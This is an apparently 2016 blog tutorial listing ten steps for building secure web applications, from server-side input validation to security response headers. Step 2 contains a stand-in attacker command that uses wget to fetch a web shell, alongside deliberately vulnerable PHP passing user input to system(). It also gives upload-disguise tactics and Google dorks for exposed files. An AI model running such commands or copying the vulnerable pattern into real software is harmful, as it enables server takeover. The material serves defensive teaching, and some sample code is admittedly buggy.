10-steps-to-writing-and-developing-secure-applications
Building websites is easy. Building insecure websites is easy. Building secure websites can be easy as well. But it requires one basic behaviour change that most of you will find dis-concerting. There are many many things to take care of while building applications but lets start with 10 that will give a head-start in securing your applications.
- Don’t trust any data that comes from a form submission
- Don’t trust any data from a drop down box or Using drop down boxes securely
- When allowing uploading of files, always check the type of file on server side
- Any file that is inside the document root can be referenced using a simple GET request, keep sensitive information out of it
- Always check for data type, boundary conditions for most fields
- Log errors but never display errors to end users
- Any check for authorisation needs to happen at the server side, based on authenticated user
- Any AJAX or XMLHTTPREQUEST can be intercepted and looked at. So always check for authentication and authorization
- Don’t roll out you own crypto, use standard well-known libraries for crypto
- Use response headers newer browsers support to add security for users and applications
Step 1 Don’t trust any data that comes from a form submission
HTML Forms are the primary way humans send data to web sites. The form controls are all part of the HTML spec and don’t require any JavaScript or CSS to function as expected. Developers do make forms look nicer and behave better by using CSS and JavaScript but that is not a necessity.
Since we are talking about HTTP based web applications, we need to understand that this is primarily a request and response protocol. A web client usually a web browser makes a request and usually a web server sends a response. Therefore for a successful form submission, all of the below happens first.
- Browser is going to make a GET request to the server for the page that contains the HTML code for a form.
- Server is going to send the HTML file which contains the form. This is rendered by the browser and shown as form controls to the user.
- At this point, the user will fill the form and click on submit.
- Server gets the data, user filled up and passes it to the application for processing.
So whatever data is sent at step #3 shouldn’t be trusted. This data should be verified, validated and only then used for further processing. The question is what went wrong at step #3.
The first request asked the server for the HTML source code which the browser will show as a form. The response to this is the form code in HTML.
Now the form on the users computer. The HTML for the form is also on the users computer. If the user wants, they can change the HTML code, bypass any length restrictions, any hidden fields and most importantly remove any JavaScript validations a developer might have added.
HTML code gets rendered by a browser to look the way modern forms look, with text fields, buttons, drop down boxes etc.
The only defence that developers have is not accept anything that comes from a HTML form without proper validation on the server side. Now most users will not try to manipulate forms to bypass restrictions etc. But the users that will try this, will mostly go ahead and directly change values of the data being sent as part of the POST request. This can be done in many ways, the simplest being use of a browser extension called Tamper Data.
So the form code with its fields etc. looks very different to an attacker and this makes all the difference.
The tampered data and the form code are slightly different here
Other ways to do this is to intercept all the data the browser will send and relay it through a proxy software. This way the proxy software can receive all the requests and subsequently all the responses.
Experienced developers use similar tools like Tamper Data like Firebug, Fiddler to troubleshoot problems etc. The only difference is in the intention and objectives.
Tamper data makes it extremely trivial to change values of the parameters being sent and it does this after the submit button on the form has been clicked. This means that all JavaScript related checks have already been done by the browser but the data still hasn’t reached the server it was intended for.
Start tampering data is as easy as clicking on a button
Once you realise how simple it is to change the data that can be submitted, you understand the importance of never trusting any data coming from a form submission without proper validation and verification.
Step 2 Don’t trust any data from a drop down box or Using drop down boxes securely
While we are on the subject of not trusting form data submission, lets talk about a specific case. I hope that after going through step 1 you are in agreement with me that form data validation is a must. Sometimes the form data comes from drop down boxes or the HTML Select and Option tags.
Most developers are under the impression that these values can’t be changed. On the other hand if you are under no such assumption, congratulations you are already on the way of creating secure applications. But if you are or were until recently, lets clear this up completely and permanently.
Lets take a hypothetical scenario which is so bad that it is highly unlikely in the real world. But will help us understand this better.
Consider there is a HTML form. This form contains commands that can run on a server. The commands are simple networking related troubleshooting tools that allow someone with no command line experience to use the form to understand the state of the network. Obviously on the server side, based on the input received a command is executed and the output of that is displayed.
Simple form that can be manipulated
It is a simple enough form with two fields. We can choose the command and choose the host we want to test the network command against. So from the drop down box we can select ping, nslookup or traceroute and add an IP address like 8.8.4.4 or host name like www.google.com.
The idea is on the server side, the server will get a combination of the command and the host name/IP address and it will execute the command. Simple functionality which will allow any one with no networking background or command line experience to execute the commands, see the results and take appropriate actions. This kind of form would be quite useful for an Internet Service Provider etc.
The HTML code powering this form is simple enough and the part we are interested in is the options tag. Each item has a value which is sent to the server back end.
<select id="cmd" name="cmd" class="form-control">
<option value="ping">ping</option>
<option value="nslookup">nslookup</option>
<option value="traceroute">traceroute</option>
</select>
Can you spot the potential problems with this code? What can go wrong if this form is tampered with and the data changed?
Instead of sending ping what if we send wget https://attackersite/webshell.php. This will download a file called webshell.php in the current directory and that can be used to remote control the server.
<?php $cmd = $_POST['command'];
$host = $_POST['host'];
print("<pre>");
system($cmd. ' '. $host);
print("</pre");
?>
So how should we code for such a scenario? How do we ensure that only our whitelisted commands execute and we don’t have to completely trust the input coming from the drop down box.
We can use two security architecture principles that will guide us to be secure in this scenario. First we need to reduce the attack surface. Attack surface simply means all the places and inputs that can be used to attack the application. In the real world, think of a fielder who can see three stumps to aim at compared to a fielder who can see only one stump. Obviously the job is harder for the fielder who can see only one stump.
So what we can do is make sure that the option values are not commands. They are numbers starting from zero and based on the option value, we execute a command. We also add a default in case we don’t get a number between zero and two.
$opt = $_POST['option'];
switch ($opt) case 0:
$cmd = 'ping';
break;
case 1:
$cmd = 'nslookup';
break;
case 2:
$cmd = 'traceroute';
break;
default:
$cmd = 'ping';
This completely reduces the attack surface for the drop down box. Any value that is different from a number is not accepted and the commands that are allowed to be executed are whitelisted. This is an example of defensive programming where we have clearly nullified any kind of tampering that might be possible and ensured that no unpleasant surprises can happen for this field.
Obviously we do need to make sure that the hostname field is processed after validation and not blindly.
Step 3 How do you know that image a user uploaded, is an actual image?
So many websites allow uploading of images as part of a display picture, profile picture etc. For all practical purposes uploading of an image or any type of file basically means that you are allowing anyone on the whole of the Internet to upload their files on to your server. Would you allow a stranger to put their stuff in your house? Probably not.
As we have seen before, we can’t trust any data coming from a form. The file upload form is no different from forms that ask and accept other kinds of data. Most of the times developers worry about how big a file to allow and what kind of file to allow. While the size check is reliable on the server side, relying on the file name and file extension which comes from the user is not a good idea at all. From the image we can clearly see that file name, content type etc. all come from the user and hence can not be trusted.
Attacker can name a PHP file with a .jpg extension
The typical workflow on the server side for a file upload goes like this
- HTML form allows for file upload.
- File itself is uploaded to a temporary folder.
- The temporary file is checked for size first.
- If the file size is within limits, the developers check the file extension.
- If the extension matches what is allowed, the file is moved to a folder inside the web server document root.
- At some point during all of this, the required file name, path etc. is copied to the database of the website as well.
Can you figure out, what can go wrong? If the server backend supported PHP, a file with PHP code but a wrong extension can get copied to the web server document root. This is completely insecure. Even if the web server configuration is secure and a file name ending with an image extension like .jpg will not be executed as a PHP file, the fact that a file full of arbitrary code written by someone else is part of your website now.
How exactly can an attacker accomplish this? The attacker needs to do the following:-
- Rename a PHP file as a jpg file.
- While uploading, the attacker will change the values of content type and if required file name.
- If the file is within size limits, then the extension will be checked. Figuring out which file extensions are allowed is quite trivial for an attacker.
- Once the file is moved into the web server document root and no filename was changed, all the attacker needs to do is make a simple GET request to the file with full path.
- Simplest way to make a GET request is to put the full path in the browser address bar.
At this point what the attacker will do, completely depends on their intention. But if their intention was to add a new code file in your website, they just succeeded.
Ideally, whenever a new file is uploaded on to a server the following things should be taken care of.
- Check the file for size, if exceeding don’t process further.
- Check the file for its magic-number. This is a value which identifies the file to the operating system.
- The value of the magic-number also known as mime type should determine what the extension of the file.
- Sometimes a file can contain the proper magic-number but still contain code as well. Attackers have managed to create such type of files.
- In such cases, we need to do more investigation before can copy such files to the web server document root.
- Give the file a random name and extension based on the magic-number.
- If the functionality demands images to be uploaded, a good test is try opening such a file with an image editing function or library.
- A non image without proper data is likely to be corrupted for image transforms etc.
- This is not a fool proof method but likely to work.
- If all of this is good enough and we are ready to copy such an image to the web server document root, the server configuration should be explicitly set, so that no image file is confused as a server program and executed.
Read more about magic numbers on wikipedia https://en.wikipedia.org/wiki/Magic_number_(programming)#Magic_numbers_in_files
*Read more how an file which has a magic number of a PNG can still be a PHP script. https://www.sentex.net/~mwandel/jhead/ *
I hope you have begun to understand just how incredibly difficult it can be to validate if an image is an actual image or not. And if our requirement is to test for another type of file it might be more complicated as well.
Step 4 Any resource/file inside a web server document root can be addressed
A Uniform Resource Locator allows to reach a web resource, file, document, downloadable file, javascript file, css file etc. or a path anywhere on the world wide web of the Internet. Any file, regardless of its type, if located inside what is known as a web server document root can be addressed using a URL schema.
URL schema gives us a way to address a file. For example a simplistic example is
http://akashm.com/ip.php
An expansive example of what URL schema can look like
Any link which clicked opens your email client is also a URL schema
Now we know that any file kept inside the web server document root can be addressed. If it can be addressed it can be requested using a browser. And humans can request it, so can automated programs like search engine crawling bots. This is such an easy win for attackers and security professionals alike that they have created entire databases for finding and search such files which are already indexed by a search engine like Google called Google Hacking Database (GHDB). https://www.exploit-db.com/google-dorks/
If you search for the following in Google, you will get thousands of search results.
inurl:phpinfo.php PHP Credits
Thousands of websites have php information out in the open
Are there any files you can think of, which shouldn’t be visible to users or programs? There are many such files, in-fact security folks have created a good list that you can refer to https://github.com/pwnwiki/webappurls.
Files that might contain sensitive information like database configuration information, information about state of the server, installed software are all of interest to attackers. A lot of times output of long running scripts, database backups, web site backups etc. are all present in the document root and can be downloaded by anyone. Web developers use files and folders which are not linked by the website at all. The idea is that if no link is present in the website no one can figure out all such hidden and secret files and folders. What they forget is the fact that it only takes a couple of GET requests to figure out if a particular file or folder exists in the document root or not. It is quite possible that there are further restrictions on permissions for a particular file or folder but if a URL is correct, the resultant HTTP status code will mostly be 200 OK.
So what is the secure way of doing this? Most of the times, important files can be kept out of the document root and still be available for scripts which are inside the document root. In such cases it might be prudent to keep such files in a folder called private which can never be accessed
Step 5 Always check for data type, boundary conditions for most fields
This is purely about input validation. Security in web applications requires a structured process oriented approach. One of the most important things to remember is that if we understand business requirements we can build secure applications without too much extra effort.
Based on what we are expecting in the request parameters our validation functions need to confirm the following
- If the data we are getting is of the correct data type.
- For string data type, we should always confirm maximum length.
- For integer check minimum and maximum value allowed for integer data types.
- Prefer whitelisting instead of blacklisting of data.
- Prefer object level comparisons rather than assuming that strings are being compared.
- Use regular expressions sparingly and in situations where the data has already been checked for the above.
Most of the times, missing any of the above may not cause a major security hole, but allow for errors in functioning of the application or even displaying of errors on web pages. This type of information could be leveraged by the attackers to chain attacks or better understand the overall system.
Check if it is a valid username or not
$username = $_POST['username'];
if (is_string($username) and !(strlen($username) >= 1 and strlen($username) <= 50))
{
// Write some code
}
Check if a numeric id is valid or not
$id = $_POST['id'];
if(is_numeric($id) and $id >= 1 and $id <= 9999)
{
// Write some code
}
Check if lang is whitelisted
$lang = $_GET['lang'];
$langarray = ['en','fr','de','hi','es'];
if(in_array($lang, $langarray))
{
// Write some code
}
The above examples give you some idea about what we are talking about. The whole process is basically wash, rinse and repeat. It needs to be done for each and every input that will be used on the web site.
Step 6 Log errors but never display them to users
A lot web applications “leak” information through errors that reveal internal paths, server usernames, sql queries, which databases is being used etc. A lot of times log files either get written inside document root which as we saw are readable by anyone or error conditions generate stack traces etc. which can reveal a lot of information about the web application. By itself this may not be a big deal, but if the application has some other flaws that can be misused then this can become extremely dangerous.
Following example will throw a NullPointerException if the parameter “name” is not part of the request
protected void doPost (HttpServletRequest req, HttpServletResponse res)
throws IOException
{
String name = getParameter("name");
...
out.println("hello " + name.trim());
}
Example is from the OWASP page on information leakage
Example of MySQL Error statement revealing username and password for database access
Warning: mysql_pconnect(): Access denied for user: 'root@localhost'
(Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc
on line 4
Example is from the OWASP page on information leakage
A google dork to find PHP errors logs being written in document root
'PHP Fatal error' 'not found' inurl:error_log
Search for this snippet on Google, you will find thousands of websites leaking information
In Microsoft dotnet, an attacker can induce an error due to the security features provided by the framework. In any form field (example search box), adding HTML and JavaScript tags will trigger a Server Error. If this error is not handled properly and a custom error page not shown, the resultant error page contains a lot valuable information for the attacker. This includes version numbers, stack trace etc.
A .net page server error revealing information, triggered by bad input provided by an attacker
Step 7 Authorization after Authentication, always on the server side
This is an extremely important step which can make the difference between secured access with confidentiality and integrity for an organisation or an attacker waltzing away with sensitive data held by the company.
For websites, a simple mapping table can be created
Type of Page What we need
- Public Page Unauthenticated
- Private Page Authenticated
- Restricted Private Page Authorization
This allows everyone to quickly establish if a web page requires authenticated access or not. A login page will be public, so that anyone can come and with proper credentials be able to gain access to the private pages of the site. Editing a profile page will be a private page, but viewing a profile page could be public. Any type of admin functionality, admin control panel, user management page etc. should be restricted. A restricted page is a private page (only meant for authenticated users) which also confirms, rights of a particular user to be able to access that page.
Role Based Access Control (RBAC) is the term used to describe such scenarios. An admin user might be able to see the profiles of all the users and even edit those, but a regular user should be able to edit only their own profile settings.
The common trap developers get into is that a page not linked to, or a web page part of a workflow will only be accessed in the correct sequence and by the authorized person only. As we saw in Step 4 that any file, link, resource inside the document root can be addressed and requested, this assumption is incorrect for security.
See the following workflow example 1. https://example.com/buy?action=chooseDataPackage 2. https://example.com/buy?action=customizePackage 3. https://example.com/buy?action=makePayment 4. https://example.com/buy?action=downloadData
*Developer assumes that the user will follow the sequence, an attacker will simply go to the fourth step. From OWASP cheat sheet on access control https://www.owasp.org/index.php/Access_Control_Cheat_Sheet *
So how does a developer ensure that a workflow is followed and secure authentication and authorization can take place? By following a simple rule, always store state on the server side. Let me explain with an example.
Insecure way of knowing the user level
<input type="text" name="fname" value="Derek">
<input type="text" name="lname" value="Jeter">
<input type="hidden" name="usertype" value="admin">
This data is coming from the form submission, we already know (read Step 1) that we can not trust or depend on any data coming from there. Therefore a better way is
Checking for admin?
$user = $_POST['user'];
if(is_user_admin($user))
{ // Write code for doing admin stuff
}
function is_user_admin($username)
{
// Login into database
// Get role for username
// Does the role match 'admin' return True, else return False
}
Pseudo code for a simplified example for checking if user is admin or not
The point is, that you can trust all the code and data stored in the database on the server side. Use that information to verify and validate role for user etc.
Checking if workflow is maintained
$workflow_steps = ['chooseDataPackage','customizePackage','makePayment','downloadData'];
// Step 1 $current_status_of_order = NULL;
if( $current_status_of_order == NULL and chooseDataPackage() )
{
$current_status_of_order = $workflow_steps[0];
} elseif( $current_status_of_order = $workflow_steps[0] and customizePackage() )
{
$current_status_of_order = $workflow_steps[1];
} elseif( $current_status_of_order = $workflow_steps[1] and makePayment() )
{
$current_status_of_order = $workflow_steps[2];
} elseif( $current_status_of_order = $workflow_steps[2] and downloadData() )
{
$current_status_of_order = $workflow_steps[3];
} else { $current_status_of_order = NULL;
// Something went wrong, do you want to start again
}
Please note, the code and example is for illustration of a concept, may not be optimised, syntactically correct etc., please do excuse mistakes
So the order process required a certain flow, using logic and language constructs we can ensure that happens. Again no data from outside the server was depended on for this code snippet.
Step 8 AJAX Security, means AuthN and AuthZ, always on the server side
This step is basically an extension of the previous one. AJAX or Asynchronous JavaScript and XML is a web development technique used on the client side to create asynchronous web applications (from Wikipedia). This basically boils down to, that we can send and receive data from a server without interrupting the current user flow and this makes for a great user experience.
It all sounds great and everyone including me loves it. The security problem that is completely missed out is that in terms of the HTTP request there is hardly any difference between a regular request or an AJAX based request. AJAX requests are usually made with XMLHttpRequest function and for the end use acts like a magical way to interact with web applications.
Lets see how the requests for a form submitted with AJAX looks and a form submitted regularly looks.
As you can see, there is no difference at all
So for an attacker, there is no difference between a regular form submission and a AJAX based form submission. As long as the attacker knows the action for the form (where is it getting submitted to) and what are the parameters being sent, for them it is just another POST. Therefore all that we understood for Step1 applies here as well. Anything sensitive needs to be verified and validated. A lot of times developers forget to add the require authentication and authorization checks which are present for regular web pages. All web pages serving AJAX requests also need to have those in place.
Step 9 Always use standard well-known libraries for cryptography
Web applications deal with lots of different types of data. Some of the data needs to be protected while in motion, while resting and while in use. A standard technique to protect data at various states is to encrypt it and only decrypt as and when required.
From Wikipedia
Encryption is the process of encoding messages or information in such a
way that only authorized parties can read it. Encryption does not of
itself prevent interception, but denies the message content to the
interceptor. In an encryption scheme, the message or information,
referred to as plaintext, is encrypted using an encryption algorithm,
generating ciphertext that can only be read if decrypted.
For technical reasons, an encryption scheme usually uses a pseudo-random
encryption key generated by an algorithm. It is in principle possible to
decrypt the message without possessing the key, but, for a well-designed
encryption scheme, large computational resources and skill are required.
An authorised recipient can easily decrypt the message with the key,
provided by the originator to recipients but not to unauthorised
interceptors.
So basically, for an attacker to bypass encryption, they either need the keys or they need to find security issues with the encryption algorithm itself. Cryptograhpy is a highly specialized subject and experienced cryptographers always say that one should never create our own algorithms for encryption but use well known libraries provided as part of our language or framework.
Bruce Schneier Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can’t break. It’s not even hard. What is hard is creating an algorithm that no one else can break, even after years of analysis. And the only way to prove that is to subject the algorithm to years of analysis by the best cryptographers around.
There are many different types of attacks possible against encryption algorithms which can be categorised based on how much knowledge the attacker has to start with. Many of such attacks like Timing attacks, Brute Force attacks, Attacks on the Psuedo Random Number Generators etc. combined with weak implementations means that any widely used cryptography algorithm has had a thorough test of its ability to withstand attacks and has a better chance of securing the data and keeping it secure for a long time to come, compared to anything that you might be able to create.
There is a very information thread on Security Stack Exchange that everyone should read
http://security.stackexchange.com/questions/18197/why-shouldnt-we-roll-our-own
Step 10 Use modern response headers for security
Finally we are at step 10. We have stopped trusting data coming from browser forms, drop down boxes, file uploads, understood that anything that is in document root can be requested and realized that everything requires the server to be trusted. After looking at all of this, we haven’t covered the complete gamut of attacks and vulnerabilities that are possible on web sites.
Responses contain headers, in the newer browsers, security has been added so that servers and clients which support and understand these new headers can offer more security. The caveat to know about is that not all headers are supported in all the browsers and versions.
Some of the text is from an article I wrote long ago on Security Response Headers https://resources.infosecinstitute.com/http-response-headers/
Set-Cookie with Secure and HTTPOnly
We use cookies for maintainig sessions. There are couple of additional keywords that can be passed to the Set-Cookie header. These keywords are HTTPOnly and Secure. HTTPOnly tells the browser that it can’t share the cookie value with the JavaScript running on that page. In modern applications this may or may not be a great idea.
Secure keyword is useful when the application is being served over HTTPS. The Secure keyword tells the browser that please send the cookie over the wire/network when the request is made over the HTTPS schema and not over HTTP. This way the user can’t be tricked in making requests over plain text HTTP when they are already using HTTPS.
Protecting against Cross Site Scripting
This is a client side XSS prevention tool. The X-XSS-Protection header tells the browser to actively detect and stop cross site scripting attacks. It is an interesting response header as if it was effective then it would be wonderful, but security folks have managed to find bypasses for this. But again your milage might vary (YMMV)
Protecting against ClickJacking
Clickjacking is a sneaky attack where an invisible frame covers your website and whatever the users of your application type or click it goes to the invisible frame first. This type of attack which preys on the trust of the user, is very hard to defend against. One defence that has become popular amongst the larger consumer websites like Google, Facebook, Twitter etc. is to not allow to be framed inside another frame or be called from an iframe tag.
They achieve this using the X-Frame-Options response header. Either the value passed to this header is to Deny framing at all or only allow it from the same origin domain. This ensures that no other website can add your site as an iframe and cause clickjacking.
You can go check the headers for Google, Facebook, Twitter and you will always find this header in their responses.
Strict-Transport-Security
This is a HTTP response header which tells the browser that it should be loaded over HTTPS. This is required to avoid an attack as mentioned by Moxie Marlinspike called SSL Strip. In this attack even one request sent over HTTP allows the attacker to spoof the HTTPS requests to the Website.
Strict-Transport-Security: max-age=expireTime [; includeSubdomains]
This is useful if you insist on accessing your bank Website while using free public WiFi. The header can’t take care of the first request made by the browser which might be to load the HTTP version. Typically Websites set an expiry time of 100 days to ensure that the header isn’t expiring.
Strict-Transport-Security: max-age=8640000
Twitter uses almost all the headers we discussed about
Content Security Policy
Rather than use the patchwork of different HTTP response headers for increasing security of its users, Mozilla decided to tackle the problem slightly differently. They created what is called the Content Security Policy (CSP). Recognising that more and more Websites are pulling active content from various domains, the Content Security Policy allows the Website owner to whitelist domains other than itself. This does mean that the onus on protecting those domains is with the Website owner.
There are many policy directives that can be set and the best reference for this is “Using the Content Security Policy” document hosted on the Mozilla Developer Network wiki. Sample Policy
X-Content-Security-Policy: allow ‘self’; img-src *; object-src media1.com media2.com; script-src userscripts.example.com; allow https://payments.example.com
This policy defines that all scripts from the same domain are allowed. The image sources can point to any domain (this is a weakness) and objects like flash etc. can be loaded from specified domains. Additionally the payments subdomain can only be loaded over SSL/TLS.
Modern Web applications require modern and upgraded defences. As the Web applications have become more sophisticated, so have the Web browsers. This in turn has spurned newer attacks and consequently defences. We looked at some of the new HTTP response headers being used to protect Web users from various kinds of attacks.
That completes our look at 10 steps to writing and developing secure web applications. There are many things that we have glossed over and there is more that can be done. I hope that if you get started with these or validate that you are already taking these 10 steps then you are well and truly on the way towards building secure applications.
Published 30 Jul 2016
Originally published at akashm.com on September 28, 2016.